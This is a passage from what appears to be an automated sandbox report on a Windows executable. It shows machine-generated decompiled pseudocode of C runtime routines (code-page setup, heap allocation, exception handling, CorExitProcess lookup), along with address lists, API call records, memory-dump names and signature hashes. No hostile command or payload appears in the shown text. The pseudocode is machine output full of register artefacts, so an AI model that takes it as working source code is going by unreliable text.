						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					_push(_t98);
					E00157D02();
				}
				L39:
				return E00151B61(_v8 ^ _t99);
			}

0x001580c6
0x001580cd
0x001580d2
0x001580d5
0x001580dd
0x001580e2
0x001580f3
0x001580f3
0x001580f5
0x001580f6
0x001580f7
0x001580f9
0x001580fc
0x001580fc
0x00158102
0x00000000
0x00000000
0x00158108
0x00158109
0x0015810c
0x0015810f
0x00158114
0x00000000
0x00158116
0x00158116
0x0015811c
0x001581ea
0x00158122
0x00158122
0x00158128
0x00000000
0x0015812e
0x00158132
0x00158138
0x0015813a
0x00000000
0x00158140
0x00158145
0x0015814b
0x0015814d
0x001581d7
0x001581dd
0x00000000
0x001581df
0x001581df
0x001581e0
0x00000000
0x001581e0
0x00158153
0x0015815d
0x00158162
0x0015816a
0x00158170
0x00158171
0x00158174
0x001581c7
0x00158176
0x00158176
0x0015817a
0x0015817d
0x0015817f
0x0015817f
0x00158182
0x00158184
0x00000000
0x00000000
0x00158186
0x00158189
0x00158194
0x00158194
0x00158196
0x00000000
0x00000000
0x0015818e
0x00158193
0x00158193
0x00158193
0x00158198
0x0015819b
0x0015819e
0x00000000
0x00000000
0x00000000
0x0015819e
0x0015817f
0x001581a0
0x001581a0
0x001581a3
0x001581a8
0x001581a8
0x001581ab
0x001581ac
0x001581ac
0x001581ac
0x001581bc
0x001581c2
0x001581c2
0x001581cc
0x001581cf
0x001581d0
0x001581d1
0x00158295
0x00158295
0x00158296
0x0015829b
0x0015829c
0x0015829c
0x0015814d
0x0015813a
0x00158128
0x0015811c
0x00000000
0x0015829e
0x001581fc
0x00158204
0x00158204
0x00158208
0x0015820b
0x00158211
0x00158214
0x00158214
0x00158217
0x00158219
0x0015821b
0x0015821b
0x0015821e
0x00158220
0x00000000
0x00000000
0x00158222
0x00158225
0x00158241
0x00158241
0x00158243
0x00000000
0x00000000
0x0015822a
0x00158230
0x00158232
0x00158238
0x0015823c
0x0015823c
0x0015823d
0x00000000
0x0015823d
0x00000000
0x00158230
0x00158245
0x00158248
0x0015824b
0x00000000
0x00000000
0x00000000
0x0015824b
0x0015824d
0x0015824d
0x00158250
0x00158251
0x00158254
0x00158257
0x00158257
0x0015825d
0x00158260
0x0015826f
0x00158278
0x0015827d
0x00158283
0x00158284
0x00158284
0x00158287
0x0015828a
0x0015828d
0x00158290
0x00158290
0x00158290
0x00000000
0x001580e4
0x001580e4
0x001580e5
0x001580eb
0x0015829f
0x001582ae

APIs

Part of subcall function 00157C8F: GetOEMCP.KERNEL32(00000000,?,?,00157F18,?), ref: 00157CBA

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00157F5D,?,00000000), ref: 00158132
GetCPInfo.KERNEL32(00000000,00157F5D,?,?,?,00157F5D,?,00000000), ref: 00158145

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: ef4555f0ffe1e0edae6023cce89384fd6a813f96d4e59ef23eb980e4aa099956
Instruction ID: c7395e30aa6b3d3ae722a5746762acac1912874590ca76b3eb85e58ab6539fb8
Opcode Fuzzy Hash: ef4555f0ffe1e0edae6023cce89384fd6a813f96d4e59ef23eb980e4aa099956
Instruction Fuzzy Hash: B0515570A00605DEDB258F75C881ABBBFF5EF51302F14802EE8B6AF191DB75954ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 0016AAA5, Relevance: 2.6, APIs: 1, Instructions: 1077COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1c9c268cf1de4724240f98d5203c89c65fad04289c18a485822ada3d010f30d1
Instruction ID: 044cd333e046cd812939ab2e92aad7e3d5add29d953b99f65ea19580cc379e32
Opcode Fuzzy Hash: 1c9c268cf1de4724240f98d5203c89c65fad04289c18a485822ada3d010f30d1
Instruction Fuzzy Hash: E8A22220A1465896EB24DF60DC55BDEB236EF68700F1050E9D20CEB3E4E77A4F91CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00168005, Relevance: 1.7, APIs: 1, Instructions: 223libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,?), ref: 00168411

Memory Dump Source

Source File: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0c35e3f65793dcee4103fa5b30ebead1f4f7db4fbf21919369d8679f45f3354e
Instruction ID: 32dd4d01cc8a3893773d55d51bdc54ffb9c47dcb6d79c3aee725521841a9f893
Opcode Fuzzy Hash: 0c35e3f65793dcee4103fa5b30ebead1f4f7db4fbf21919369d8679f45f3354e
Instruction Fuzzy Hash: DCC1BA74D14228CAEB24CFA4D980BDDBBB2FF58300F5081AAD50DA7350EB755A85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00157D67, Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00157D67(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				void* _t91;
				signed int _t94;
				signed int _t95;
				signed int _t97;
				void* _t98;
				char* _t99;
				intOrPtr _t104;
				signed int _t107;
				void* _t109;

				_pop(_t97);
				_t107 = _t109;
				_t63 =  *0x16dc28; // 0x375adbf1
				 *(_t107 - 4) = _t63 ^ _t107;
				_t104 =  *((intOrPtr*)(_t107 + 8));
				if(GetCPInfo( *(_t104 + 4), _t107 - 0x718) == 0) {
					_t47 = _t104 + 0x119; // 0x11a
					_t98 = _t47;
					_push(0);
					_pop(_t91);
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t98;
					__eflags = _t68;
					 *(_t107 - 0x720) = _t68;
					do {
						_t99 = _t98 + _t91;
						_t69 = _t68 + _t99;
						 *((intOrPtr*)(_t107 - 0x71c)) = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags =  *((intOrPtr*)(_t107 - 0x71c)) - 0x19;
							if( *((intOrPtr*)(_t107 - 0x71c)) > 0x19) {
								 *_t99 = 0;
							} else {
								_t72 = _t104 + _t91;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t91 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t104 + _t91 + 0x19) =  *(_t104 + _t91 + 0x19) | 0x00000010;
							_t54 = _t91 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t99 = _t73;
						}
						_t68 =  *(_t107 - 0x720);
						_t61 = _t104 + 0x119; // 0x11a
						_t98 = _t61;
						_t91 = _t91 + 1;
						__eflags = _t91 - 0x100;
					} while (_t91 < 0x100);
				} else {
					_push(0);
					_pop(_t74);
					do {
						 *((char*)(_t107 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 =  *(_t107 - 0x712);
					_t94 = _t107 - 0x712;
					 *((char*)(_t107 - 0x104)) = 0x20;
					while(1) {
						_t116 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t97 =  *(_t94 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t97;
							if(_t76 > _t97) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t107 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t94 = _t94 + 2;
						__eflags = _t94;
						_t75 =  *_t94;
					}
					_push(0);
					_push( *(_t104 + 4));
					_push(_t107 - 0x704);
					_push(0x100);
					_push(_t107 - 0x104);
					_push(1);
					_push(0);
					E001589C8(0, _t97, 0x100, _t104, _t116);
					E0015A803(0, 0x100, _t104, _t116, 0,  *((intOrPtr*)(_t104 + 0x21c)), 0x100, _t107 - 0x104, 0x100, _t107 - 0x204, 0x100,  *(_t104 + 4), 0); // executed
					E0015A803(0, 0x100, _t104, _t116, 0,  *((intOrPtr*)(_t104 + 0x21c)), 0x200, _t107 - 0x104, 0x100, _t107 - 0x304, 0x100,  *(_t104 + 4), 0);
					_push(0);
					_pop(_t95);
					do {
						_t86 =  *(_t107 + _t95 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t104 + _t95 + 0x119)) = 0;
							} else {
								_t37 = _t104 + _t95 + 0x19;
								 *_t37 =  *(_t104 + _t95 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t107 + _t95 - 0x304));
								goto L15;
							}
						} else {
							 *(_t104 + _t95 + 0x19) =  *(_t104 + _t95 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t107 + _t95 - 0x204));
							L15:
							 *((char*)(_t104 + _t95 + 0x119)) = _t87;
						}
						_t95 = _t95 + 1;
					} while (_t95 < 0x100);
				}
				return E00151B61( *(_t107 - 4) ^ _t107);
			}

0x00157d68
0x00157d6b
0x00157d72
0x00157d79
0x00157d7e
0x00157d9b
0x00157e93
0x00157e93
0x00157e99
0x00157e9a
0x00157e9b
0x00157e9c
0x00157e9c
0x00157e9e
0x00157ea4
0x00157ea4
0x00157ea6
0x00157ea8
0x00157eb1
0x00157eb4
0x00157ec0
0x00157ec7
0x00157ed7
0x00157ec9
0x00157ec9
0x00157ecc
0x00157ecc
0x00157ecc
0x00157ed0
0x00157ed0
0x00000000
0x00157ed0
0x00157eb6
0x00157eb6
0x00157ebb
0x00157ebb
0x00157ed3
0x00157ed3
0x00157ed3
0x00157ed9
0x00157edf
0x00157edf
0x00157ee5
0x00157ee6
0x00157ee6
0x00157da1
0x00157da1
0x00157da2
0x00157da3
0x00157da3
0x00157daa
0x00157dab
0x00157daf
0x00157db5
0x00157dbb
0x00157de3
0x00157de3
0x00157de5
0x00000000
0x00000000
0x00157dc4
0x00157dc8
0x00157dda
0x00157dda
0x00157ddc
0x00000000
0x00000000
0x00157dcd
0x00157dcf
0x00157dd1
0x00157dd9
0x00157dd9
0x00000000
0x00157dd9
0x00000000
0x00157dcf
0x00157dde
0x00157dde
0x00157de1
0x00157de1
0x00157de7
0x00157de8
0x00157df1
0x00157df2
0x00157df9
0x00157dfa
0x00157dfc
0x00157dfd
0x00157e1e
0x00157e46
0x00157e4e
0x00157e4f
0x00157e50
0x00157e50
0x00157e5a
0x00157e6a
0x00157e6c
0x00157e83
0x00157e6e
0x00157e6e
0x00157e6e
0x00157e6e
0x00157e73
0x00000000
0x00157e73
0x00157e5c
0x00157e5c
0x00157e61
0x00157e7a
0x00157e7a
0x00157e7a
0x00157e8a
0x00157e8b
0x00157e8f
0x00157efa

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00157D8C

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: be83e7f8fb5662ad73b545c34bdea2a9351691e2e0fc3e391f4ad1d229db7eaf
Instruction ID: 9c2afa072da49927e4add81e7b57d8a6a032017757cde0238abcc893683c2cff
Opcode Fuzzy Hash: be83e7f8fb5662ad73b545c34bdea2a9351691e2e0fc3e391f4ad1d229db7eaf
Instruction Fuzzy Hash: E3415A7150834CDEDB228A64DC82BF6BBBDEF55305F2404DDE9AA8A082D3355D498F20

Uniqueness

Uniqueness Score: -1.00%

Function 00154DC6, Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00154DC6(void* __ecx, void* __edi, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t9;
				void* _t13;
				signed int _t15;
				void* _t17;
				signed int _t18;
				signed int _t23;
				long _t24;

				_t17 = __ecx;
				_t23 = _a4;
				if(_t23 == 0) {
					L2:
					_t24 = _t23 * _a8;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x16eda0, 8, _t24); // executed
						_t9 = _t8;
						if(_t9 != 0) {
							break;
						}
						__eflags = E001546CC();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E001553A4())) = 0xc;
							_t9 = 0;
							__eflags = 0;
							L9:
							return _t9;
						}
						_t13 = E0015903E(_t17, _t18, _t24, __eflags);
						_t17 = _t24;
						__eflags = _t13;
						if(_t13 == 0) {
							goto L8;
						}
					}
					goto L9;
				}
				_t15 = 0xffffffe0;
				_t18 = _t15 % _t23;
				if(_t15 / _t23 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00154dc6
0x00154dcc
0x00154dd1
0x00154ddf
0x00154ddf
0x00154de5
0x00154de7
0x00154de7
0x00154dfe
0x00154e07
0x00154e0d
0x00154e0f
0x00000000
0x00000000
0x00154def
0x00154df1
0x00154e13
0x00154e18
0x00154e1e
0x00154e1e
0x00154e20
0x00154e22
0x00154e22
0x00154df4
0x00154df9
0x00154dfa
0x00154dfc
0x00000000
0x00000000
0x00154dfc
0x00000000
0x00154e11
0x00154dd7
0x00154dd8
0x00154ddd
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00154E68,00000000,?,00156A3F,00000001,00000364,?,?,001553A9,001550B0,00154E68,?), ref: 00154E07

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8c254428f83827e6bacc6052c62b68bd9597516eaad3d7249bcfe925cd0eaa92
Instruction ID: d2f497f087dcca03e2ce7dc6de5ccba1d7ce9319ecb77cc7c7eb81e76b321e4a
Opcode Fuzzy Hash: 8c254428f83827e6bacc6052c62b68bd9597516eaad3d7249bcfe925cd0eaa92
Instruction Fuzzy Hash: 10F05931905024FBDB311AB5DC02A9B7B68FB503A7B041521FC34DE194C7B09CD882E0

Uniqueness

Uniqueness Score: -1.00%

Function 00154CDB, Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00154CDB(void* __ecx, void* __edi, long _a4) {
				void* __esi;
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				long _t12;

				_t7 = __ecx;
				_t12 = _a4;
				if(_t12 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E001553A4())) = 0xc;
					_t3 = 0;
					__eflags = 0;
					L8:
					return _t3;
				}
				if(_t12 == 0) {
					_t12 = _t12 + 1;
				}
				while(1) {
					_t3 = RtlAllocateHeap( *0x16eda0, 0, _t12); // executed
					if(_t3 != 0) {
						break;
					}
					__eflags = E001546CC();
					if(__eflags == 0) {
						goto L7;
					}
					_t5 = E0015903E(_t7, _t8, _t12, __eflags);
					_t7 = _t12;
					__eflags = _t5;
					if(_t5 == 0) {
						goto L7;
					}
				}
				goto L8;
			}

0x00154cdb
0x00154ce1
0x00154ce7
0x00154d19
0x00154d1e
0x00154d24
0x00154d24
0x00154d26
0x00154d28
0x00154d28
0x00154ceb
0x00154ced
0x00154ced
0x00154d04
0x00154d0d
0x00154d15
0x00000000
0x00000000
0x00154cf5
0x00154cf7
0x00000000
0x00000000
0x00154cfa
0x00154cff
0x00154d00
0x00154d02
0x00000000
0x00000000
0x00154d02
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00158A6C,00000000,?,?,00154ED7,?,00000008,?,001560E1,?,?), ref: 00154D0D

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6823712dbafa9dc56bc74ecde1623b23529bcba7168fc50b6dad01d8bde5fc72
Instruction ID: 0b9ae4f1b68c17a1bcae8af8697752fb51d5ead04808ee4a74d5aa7856be466d
Opcode Fuzzy Hash: 6823712dbafa9dc56bc74ecde1623b23529bcba7168fc50b6dad01d8bde5fc72
Instruction Fuzzy Hash: B7E06525505126E7DB2126F5DC00B6B7668AB617EBF150261FC349F191D7B088C8C1E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00151755, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00151755(intOrPtr __edx, intOrPtr __edi) {
				intOrPtr _t38;
				signed int _t49;
				intOrPtr _t51;
				signed char _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				void* _t62;
				void* _t63;

				_t58 = __edi;
				_t57 = __edx;
				_t62 = _t63;
				_push(_t51);
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t56 =  *((intOrPtr*)(_t62 + 8));
					asm("int 0x29");
				}
				 *0x16e3e8 = 0;
				 *((intOrPtr*)(_t62 - 0x274)) = E00151E90(_t58, _t62 - 0x324, 0, 0x2cc);
				 *((intOrPtr*)(_t62 - 0x278)) = _t56;
				 *((intOrPtr*)(_t62 - 0x27c)) = _t57;
				 *((intOrPtr*)(_t62 - 0x280)) = _t51;
				 *((intOrPtr*)(_t62 - 0x284)) = 0;
				 *((intOrPtr*)(_t62 - 0x288)) = _t58;
				 *((intOrPtr*)(_t62 - 0x25c)) = ss;
				 *((intOrPtr*)(_t62 - 0x268)) = cs;
				 *((intOrPtr*)(_t62 - 0x28c)) = ds;
				 *((intOrPtr*)(_t62 - 0x290)) = es;
				 *((intOrPtr*)(_t62 - 0x294)) = fs;
				 *((intOrPtr*)(_t62 - 0x298)) = gs;
				asm("pushfd");
				_pop( *_t15);
				 *((intOrPtr*)(_t62 - 0x26c)) =  *((intOrPtr*)(_t62 + 4));
				_t38 = _t62 + 4;
				 *((intOrPtr*)(_t62 - 0x260)) = _t38;
				 *((intOrPtr*)(_t62 - 0x324)) = 0x10001;
				 *((intOrPtr*)(_t62 - 0x270)) =  *((intOrPtr*)(_t38 - 4));
				E00151E90(_t58, _t62 - 0x58, 0, 0x50);
				 *(_t62 - 0x58) = 0x40000015;
				 *((intOrPtr*)(_t62 - 0x54)) = 1;
				 *((intOrPtr*)(_t62 - 0x4c)) =  *((intOrPtr*)(_t62 + 4));
				_t28 = IsDebuggerPresent() - 1; // -1
				 *(_t62 - 8) = _t62 - 0x58;
				asm("sbb bl, bl");
				 *((intOrPtr*)(_t62 - 4)) = _t62 - 0x324;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter(_t62 - 8);
				if(_t49 == 0) {
					_t49 =  ~(_t54 & 0x000000ff);
					asm("sbb eax, eax");
					 *0x16e3e8 =  *0x16e3e8 & _t49;
				}
				return _t49;
			}

0x00151755
0x00151755
0x00151757
0x0015175e
0x00151769
0x0015176b
0x0015176e
0x0015176e
0x0015177f
0x0015178d
0x00151793
0x00151799
0x0015179f
0x001517a5
0x001517ab
0x001517b1
0x001517b8
0x001517bf
0x001517c6
0x001517cd
0x001517d4
0x001517db
0x001517dc
0x001517e5
0x001517eb
0x001517ee
0x001517f4
0x00151803
0x0015180e
0x00151819
0x00151820
0x00151827
0x00151831
0x00151839
0x00151842
0x00151844
0x00151847
0x00151849
0x00151859
0x0015185b
0x00151860
0x00151862
0x00151864
0x00151864
0x0015186f

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00151762
IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 0015182A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,00000017,?), ref: 00151849
UnhandledExceptionFilter.KERNEL32(?,?,?,?,00000017,?), ref: 00151853

Strings

`Vxt, xrefs: 0015182A

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID: `Vxt
API String ID: 254469556-3269278918
Opcode ID: e146e03a421ad1c2fa1d81cc738f8a78171412e0d4b1c305c551f58a30e89cf8
Instruction ID: 00cfa95676592bd825feb72c8a9615700ae67addc61d8639ea540a6e67eb1e05
Opcode Fuzzy Hash: e146e03a421ad1c2fa1d81cc738f8a78171412e0d4b1c305c551f58a30e89cf8
Instruction Fuzzy Hash: 13310875C01228EBDB21DFA5DD896DDBBB8EF08345F1041AAE40CAB210E7755A888F50

Uniqueness

Uniqueness Score: -1.00%

Function 0015511E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0015511E(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t67;
				intOrPtr _t68;
				int _t69;
				intOrPtr _t72;
				signed int _t74;
				signed int _t76;

				_t72 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				_t62 = __ebx;
				asm("pushad");
				asm("popad");
				_t74 = _t76;
				_t40 =  *0x16dc28; // 0x375adbf1
				_t41 = _t40 ^ _t74;
				_v8 = _t40 ^ _t74;
				_push(__edi);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E001518F0(_t41);
					_pop(_t63);
				}
				E00151E90(_t68,  &_v804, 0, 0x50);
				E00151E90(_t68,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t63;
				_v556 = _t67;
				_v560 = _t62;
				_v564 = _t72;
				_v568 = _t68;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t69 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				_t58 = _t57;
				if(_t57 == 0 && _t69 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E001518F0(_t58);
				}
				return E00151B61(_v8 ^ _t74);
			}

0x0015511e
0x0015511e
0x0015511e
0x0015511e
0x0015511e
0x0015511f
0x00155121
0x00155129
0x0015512e
0x00155130
0x00155137
0x00155138
0x0015513a
0x0015513d
0x00155142
0x00155142
0x0015514e
0x00155161
0x0015516f
0x00155175
0x0015517b
0x00155181
0x00155187
0x0015518d
0x00155193
0x00155199
0x0015519f
0x001551a5
0x001551ac
0x001551b3
0x001551ba
0x001551c1
0x001551c8
0x001551cf
0x001551d0
0x001551d9
0x001551df
0x001551e2
0x001551e8
0x001551f5
0x001551fe
0x00155207
0x00155210
0x0015521e
0x00155220
0x0015522d
0x00155233
0x00155235
0x00155241
0x00155244
0x00155249
0x00155258

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00155216
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00155220
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0015522D

Strings

`Vxt, xrefs: 00155216

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: `Vxt
API String ID: 3906539128-3269278918
Opcode ID: 90f3e4677be523f4b0aa59a3065a5c27ebbc42613d6a326aaf1b97e0dc35f832
Instruction ID: 3c7c7efc6d2ae0831fa5cc10c3fa05a829432ce94a3deb9664c67a491e1ff6d5
Opcode Fuzzy Hash: 90f3e4677be523f4b0aa59a3065a5c27ebbc42613d6a326aaf1b97e0dc35f832
Instruction Fuzzy Hash: 5431D375901218EBCB21DF68DC8979CBBB9BF18311F5041EAE81CAA251EB709B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 001544D5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00154486,?,?,00154426,?,00166878,0000000C,0015457D,?,00000002), ref: 001544F5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00154508
FreeLibrary.KERNEL32(00000000,?,?,?,00154486,?,?,00154426,?,00166878,0000000C,0015457D,?,00000002,00000000), ref: 0015452B

Strings

CorExitProcess, xrefs: 00154500
mscoree.dll, xrefs: 001544EE

Memory Dump Source

Source File: 00000004.00000002.398629304.0000000000151000.00000020.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 00000004.00000002.398612483.0000000000150000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398677361.0000000000161000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.398688658.0000000000168000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.398722803.000000000016F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 387347ddacd6732431ffd2662fc2fa43341071358340c8d36b38c4e99fdb90c7
Instruction ID: c9af0fd3a98847dba311d1336575480c8cf6d054b1bca3fe2c9abfc8896e4aae
Opcode Fuzzy Hash: 387347ddacd6732431ffd2662fc2fa43341071358340c8d36b38c4e99fdb90c7
Instruction Fuzzy Hash: 85F04F31A10118FBCF119FA0DC09BEEBFB8EB09756F050455F805E6550DB710AC4CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00159D26, Relevance: 7.7, APIs: 5, Instructions: 154
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00159D26(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
